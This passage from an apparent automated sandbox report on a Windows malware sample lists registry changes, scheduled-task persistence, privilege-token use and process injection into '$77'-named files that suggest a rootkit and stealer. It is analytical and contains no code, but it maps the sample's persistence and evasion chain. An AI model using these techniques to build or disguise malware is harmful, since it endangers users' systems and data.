Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 07 Oct 2024 10:40:09 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1728297608" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\$77Redownloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4632 wrote to memory of 3984 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 4632 wrote to memory of 3984 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 3984 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 3984 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4748 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4748 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3228 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
PID 3228 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
PID 3984 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
PID 3984 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

